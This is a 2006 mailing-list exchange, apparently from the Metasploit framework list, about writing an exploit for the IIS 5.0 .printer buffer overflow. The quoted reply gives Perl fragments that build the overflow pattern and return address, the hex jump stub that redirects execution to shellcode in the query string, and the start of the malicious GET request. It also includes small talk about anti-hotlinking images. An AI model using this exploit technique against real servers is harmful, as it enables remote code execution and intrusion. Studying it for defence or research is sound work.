iis50_printer_overflow

[sonixxfx at gmail.com (Sonixxfx)]

Thanks H D. I will take a look at this in the coming time, and I will let
you know how it goes. I have looked if I could find the url I've used when I
saw your picture, but I was unable to find it. Sorry.

Regards,

Ben




2006/3/2, H D Moore <hdm at metasploit.com>:
> On Thursday 02 March 2006 14:49, Sonixxfx wrote:
> > I am trying to write an exploit for the "iis50_printer_overflow"
> [ snip ]
> > The problem seems to be that I have few space available after the
> > return address for the payload. I believe there is something about 240
> > bytes available. So my question is how can I make use of both the space
> > available after the return address but also before the return address?
>
> If you look at our exploit, we cheat. We stick our shellcode into the
> query string and then find it again by dereferencing ebx+96 (which
> happens to be a pointer, that when has 256+64 added to it, leads back
> into our shellcode):
>
> my $pattern = $self->MakeNops(280);
> substr($pattern, 268, 4, pack("V", $target->[1]));
>
> # payload is at: [ebx + 96] + 256 + 64
> $pattern .= "\x8b\x4b\x60";         # mov ecx, [ebx + 96]
> $pattern .= "\x80\xc1\x40";         # add cl, 64
> $pattern .= "\x80\xc5\x01";         # add ch, 1
> $pattern .= "\xff\xe1";             # jmp ecx
>
> my $request = "GET http://$pattern/null.printer?$shellcode...
>
>
> > B.t.w. Nice looking man this morning on your website Metasploit ;)
> That lovely image appears if you browse the web site with a hostname that
> doesn't appear to be 'metasploit.com ' or one of our other domains. Let me
> know what URL you used to access the web site - it could be a bug. The
> purpose is to prevent people from hotlinking to images we host on our
> server.
>
> -HD
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060303/514fb9c1/attachment.htm>